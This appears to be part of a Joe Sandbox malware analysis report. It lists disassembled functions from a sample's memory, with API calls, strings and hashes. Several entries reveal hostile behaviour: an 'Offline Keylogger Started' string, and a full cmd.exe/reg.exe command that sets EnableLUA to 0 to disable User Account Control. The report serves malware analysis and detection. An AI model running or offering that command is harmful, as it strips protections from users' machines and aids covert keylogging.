                                                                                                                                                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                    • String ID: %Y-%m-%d %H.%M$.wav$jZos
                                                                                                                                                                                    • API String ID: 3809562944-19572097
                                                                                                                                                                                    • Opcode ID: f4db28624e3a80db73e70d68cfbeddb8297bffa213799493ce1442660add52a3
                                                                                                                                                                                    • Instruction ID: fcd79720b1cc7549fd94361c5e3a623f7a809dc57ec78eb3de8c41e9662cd131
                                                                                                                                                                                    • Opcode Fuzzy Hash: f4db28624e3a80db73e70d68cfbeddb8297bffa213799493ce1442660add52a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF31807A6143529FC724DF25DC94A9E7BE9FF94251F404C29E14983190FF31B909CB92
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03234320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032343E7,?,?,032947C8,?,?,0325B7A8,03236575,0325A305), ref: 03234359
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 0323435F
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,032343A8,00000002,?,00000000,00000000,?,032343E7,?,?,032947C8,?,?,0325B7A8,03236575,0325A305), ref: 03234374
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,032343A8,00000002,?), ref: 0323437A
                                                                                                                                                                                    • MessageBoxA.USER32 ref: 03234398
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                                                                                                    • Opcode ID: b330776295dd477c01390af6b327f6a8398a32ecfecf4f1a199cd220fc13d79d
                                                                                                                                                                                    • Instruction ID: 7d94634abd632c68cfcc653f07bc33fa79f7e0bcd46e281575d5e1a14e49295d
                                                                                                                                                                                    • Opcode Fuzzy Hash: b330776295dd477c01390af6b327f6a8398a32ecfecf4f1a199cd220fc13d79d
                                                                                                                                                                                    • Instruction Fuzzy Hash: DCF090E5AB434CB9FB10F361AC4AF99361C4B42F11FA48A46B6609E1CA97F065C48723
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CEB3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetConsoleCP.KERNEL32 ref: 15CEB3FE
                                                                                                                                                                                    • __fassign.LIBCMT ref: 15CEB479
                                                                                                                                                                                    • __fassign.LIBCMT ref: 15CEB494
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 15CEB4BA
                                                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,15CEBB31,00000000), ref: 15CEB4D9
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,15CEBB31,00000000), ref: 15CEB512
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                    • Opcode ID: e0711429b6f110fcd67997d3a9a8073b97c5bebc180a4fe0e987bb9ff9e0038f
                                                                                                                                                                                    • Instruction ID: f3de936e3a4f448712dfe70d7ead451e4fcdafc77bd29e5562146fb7ea0a9ac1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e0711429b6f110fcd67997d3a9a8073b97c5bebc180a4fe0e987bb9ff9e0038f
                                                                                                                                                                                    • Instruction Fuzzy Hash: C45191B1E01249AFDB00CFA8C881AEEBBF4FF09714F14455AE955E7291DB30A942CF61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CF0EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CF0C41: _free.LIBCMT ref: 15CF0C6A
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0F48
                                                                                                                                                                                      • Part of subcall function 15CE6782: HeapFree.KERNEL32(00000000,00000000), ref: 15CE6798
                                                                                                                                                                                      • Part of subcall function 15CE6782: GetLastError.KERNEL32(?,?,15CF0C6F,?,00000000,?,00000000,?,15CF0F13,?,00000007,?,?,15CF145E,?,?), ref: 15CE67AA
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0F53
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0F5E
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0FB2
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0FBD
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0FC8
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0FD3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                    • Instruction ID: 9888bc1f66cfcf87a9048db7efbc992e69b2e693abd5440debb6b3905eddb51e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F114F79640B14AAD560AFB0CC45FCB7BECEF00F05F804C16AAEF76150DEA9BA449791
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323AE80 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0323ACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0323AD15
                                                                                                                                                                                      • Part of subcall function 0323ACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0323AD39
                                                                                                                                                                                      • Part of subcall function 0323ACF8: GetModuleFileNameA.KERNEL32(03230000,?,00000105), ref: 0323AD54
                                                                                                                                                                                      • Part of subcall function 0323ACF8: LoadStringA.USER32 ref: 0323ADEA
                                                                                                                                                                                    • CharToOemA.USER32 ref: 0323AEB7
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0323AED4
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0323AEDA
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,0323AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0323AEEF
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,0323AF44,00000002,?), ref: 0323AEF5
                                                                                                                                                                                    • LoadStringA.USER32 ref: 0323AF17
                                                                                                                                                                                    • MessageBoxA.USER32 ref: 0323AF2D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 185507032-0
                                                                                                                                                                                    • Opcode ID: cc13b9300c497e5e8dcea8618d37a9df85b7c18229797c6ca83f440eb94cd5e7
                                                                                                                                                                                    • Instruction ID: 10743f644e0fd68fe8582ea65e16f084d889aa235bbd09964f75a3e6b9a9a7c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc13b9300c497e5e8dcea8618d37a9df85b7c18229797c6ca83f440eb94cd5e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 751170F9564305BED200F7A4DC85F9F73ECAB46740F404925B294DE0E0DAB4E9C48B66
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CDAADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __allrem.LIBCMT ref: 15CDAC69
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 15CDAC85
                                                                                                                                                                                    • __allrem.LIBCMT ref: 15CDAC9C
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 15CDACBA
                                                                                                                                                                                    • __allrem.LIBCMT ref: 15CDACD1
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 15CDACEF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                    • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                                                                                                                    • Instruction ID: 3b7d533337b7619b989ec6308daaf08ecf41e56114f2b6f928a248a80599356a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2381A277B00B06ABE7109E6DCC41B5BF7A9EF40324F24492AE615D6680EBF8F94187D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323E548 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0323E5E1
                                                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0323E5FD
                                                                                                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0323E636
                                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0323E6B3
                                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0323E6CC
                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 0323E701
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 351091851-0
                                                                                                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                    • Instruction ID: 2c9d97ee8af89c830433eeaa03820cee77955e13a5efc0c3457e3e4f3621c75b
                                                                                                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC51C9BA91062D9BCB62DB68CC90AD9B3BCAF4A200F0541D5F509EB211D670AFC58F65
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE8215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,15CDF720,15CDA7F5,15CDF720,15D14EF8,?,15CDCE15,FF8BC35D,15D14EF8,15D14EF8), ref: 15CE8219
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE824C
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE8274
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,FF8BC35D,15D14EF8,15D14EF8), ref: 15CE8281
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,FF8BC35D,15D14EF8,15D14EF8), ref: 15CE828D
                                                                                                                                                                                    • _abort.LIBCMT ref: 15CE8293
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                    • Opcode ID: 8f82d87ecd972750da699ad807e7ba068480b3ec40933784c21c3b90242d3138
                                                                                                                                                                                    • Instruction ID: e37f135f27d94da7def827f103fcfa23c96b61076eb1a0d0f167dda38be840a8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f82d87ecd972750da699ad807e7ba068480b3ec40933784c21c3b90242d3138
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9F0CD3B614B512ACA466E796C85F9B3D26DFC1671F240D15F91492280EF25A84182A1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CAB164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,15D150F0), ref: 15CAB172
                                                                                                                                                                                    • wsprintfW.USER32 ref: 15CAB1F3
                                                                                                                                                                                      • Part of subcall function 15CAA636: SetEvent.KERNEL32(00000000,?,00000000,15CAB20A,00000000), ref: 15CAA662
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                    • API String ID: 1497725170-248792730
                                                                                                                                                                                    • Opcode ID: 3795c378083c8f60f285d12b331678835a4e4d7d2653bad89e0869f7664f0b50
                                                                                                                                                                                    • Instruction ID: 5e7de0124dee883db6122b81cb52882807dcdbf0eb1742b55a3bb4dfb5bc19a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3795c378083c8f60f285d12b331678835a4e4d7d2653bad89e0869f7664f0b50
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0111667B604019AACB18DFA4EC948FE7BBDEE48251B10051EF50696190FF78BE45C7E4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0323355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0323357E
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 032335B1
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 032335C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                                                                                    • Opcode ID: f976f8983e295e53b57d42c4678be1001f34cfdccf554ea393e6de3f59f762c2
                                                                                                                                                                                    • Instruction ID: be8b75a2f0d3d759effcc9d1ea2d6b749f5e3763dcf2eb9717c710f51bcc358b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f976f8983e295e53b57d42c4678be1001f34cfdccf554ea393e6de3f59f762c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: D501B5B9A68318BEDB11EB90DC02BBDB3ECDB09701F104562BB10D6580E6749790C754
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA7755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 15CA779B
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 15CA77AA
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 15CA77AF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe, xrefs: 15CA7796
                                                                                                                                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 15CA7791
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                    • API String ID: 2922976086-4183131282
                                                                                                                                                                                    • Opcode ID: 2ebff524604e86cece30502982f5ebc8eecf9ac285ab51b9c228d1b940143f13
                                                                                                                                                                                    • Instruction ID: 573565f9fa85b5a64db2b1ebf1aa68c2069257ccfe849332109cdf3ee5c5d014
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ebff524604e86cece30502982f5ebc8eecf9ac285ab51b9c228d1b940143f13
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F01276D002AC76CB209BD69C4DEDF7F7DEBC5B11F00055AF605A6140DA306444CAF0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CE333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,15CE32EB,00000000,?,15CE328B,00000000,15D0E948,0000000C,15CE33E2,00000000,00000002), ref: 15CE335A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,15CE32EB,00000000,?,15CE328B,00000000,15D0E948,0000000C,15CE33E2,00000000,00000002), ref: 15CE336D
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,15CE32EB,00000000,?,15CE328B,00000000,15D0E948,0000000C,15CE33E2,00000000,00000002), ref: 15CE3390
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                    • Opcode ID: b5fc7fadb4b0df6e227f0a66158f1b5960936548bff0e45e4d2b3b932468c26b
                                                                                                                                                                                    • Instruction ID: 5cd7b169f101f74388260b88bdb3e1d059769006248bf3f9c0dbea179ddd6342
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5fc7fadb4b0df6e227f0a66158f1b5960936548bff0e45e4d2b3b932468c26b
                                                                                                                                                                                    • Instruction Fuzzy Hash: F9F0A435914219BBCF019FA4DC88BDDBFB4EF04A51F014599F906A2140CF30AD41CA90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA50E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,15D14EF8,15CA4E7A,00000001,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000), ref: 15CA5120
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000), ref: 15CA512C
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,15D14EF8,15CA4CA8,00000000,00000000,00000000,00000000), ref: 15CA5137
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 15CA5140
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                    • String ID: KeepAlive | Disabled
                                                                                                                                                                                    • API String ID: 2993684571-305739064
                                                                                                                                                                                    • Opcode ID: 124af8e31955fc79dcb00a1ab73201a5cbec03eef8be2d968ee9d4b8cf7eb7e0
                                                                                                                                                                                    • Instruction ID: e416cfe2d1cb310eef087ee8b5abf4d45ceed58f50ddbe114078e2a9ecc84ca6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 124af8e31955fc79dcb00a1ab73201a5cbec03eef8be2d968ee9d4b8cf7eb7e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F090B69143226FEF203FB48D499AE7EA9BB12610F00495EF98381651EE616444CBA2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 15CA4371 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?), ref: 15CA44C4
                                                                                                                                                                                      • Part of subcall function 15CA4607: __EH_prolog.LIBCMT ref: 15CA460C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
